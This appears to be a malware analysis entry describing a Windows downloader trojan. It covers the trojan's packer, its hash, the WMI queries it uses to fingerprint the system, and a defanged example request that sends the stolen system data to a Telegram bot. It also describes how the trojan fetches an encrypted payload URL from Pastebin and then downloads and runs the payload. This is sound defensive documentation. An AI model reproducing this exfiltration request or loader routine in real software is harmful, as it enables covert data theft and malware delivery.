Packer: Themida
Compilation date: 21.09.2023 12:32:30
SHA1 hash:
- 3f34031b923dc68667859162260b22830cbce521 (Проводник.exe)
Description
A trojan application written in C++ and designed to run on computers with Microsoft Windows operating systems. Its main purpose is to download and launch a malicious payload within an infected system.
Operating routine
Upon launch, the trojan collects the following information about the infected system:
| Parameter name (key) | The contents (value) | Data-collection method |
|---|---|---|
| Computer Name | The infected computer’s name | |
| Windows Version | Windows version | |
| Total RAM | RAM capacity | \root\CIMV2 ― Win32_ComputerSystem entity ― TotalPhysicalMemory field |
| Processor | The CPU name | \root\CIMV2 ― Win32_Processor entity ― Name field |
| External IP | User IP address | From the response when contacting hxxp[:]//api.ipify[.]org |
| Manufacturer | The name of the computer manufacturer | \root\CIMV2 ― Win32_ComputerSystem entity ― Manufacturer field |
| Model | The name assigned to the computer by its manufacturer (PC model name) | \root\CIMV2 ― Win32_ComputerSystem entity ― Model field |
| BIOS | Contains information about BIOS |
Information is also gathered about BIOS:
| Parameter Name (key) | The contents (value) | Data-collection method |
|---|---|---|
| Version | BIOS version | \root\CIMV2 ― Win32_BIOS entity ― Version field |
| Release Date | BIOS release date | \root\CIMV2 ― Win32_BIOS entity ― ReleaseDate field |
| Caption | The description from the manufacturer | \root\CIMV2 ― Win32_BIOS entity ― Caption field |
| SMBIOS | SMBIOS version | \root\CIMV2 ― Win32_BIOS entity ― SMBIOSBIOSVersion field |
Next, the technical information collected from the system is sent to a Telegram bot as a string in the following format: <key>:<value>\n.... And for that, the following parameters are used:
- 6393******:**********FKPI8su1qdfenHz********** is a bot token;
- 6346****** is a chat identifier (chat_id).
Below is an example of the resulting request:
hxxps[:]//api[.]telegram[.]org/bot6393******:**********FKPI8su1qdfenHz**********/sendMessage?chat_id=6346******&text=<system information>
After this message containing the system information is sent, the trojan obtains an encrypted target URL from the hxxps[:]//pastebin[.]com/y5NUQPwY webpage. Once this URL is decrypted, the trojan downloads the payload, saves it to %LOCALAPPDATA%\Default\Windows\data\ldled and executes it.
Artifacts
The trojan’s code includes information containing debug symbols: C:\Users\Snusoed\source\repos\Scaner_load\Release\Scaner_load.pdb.
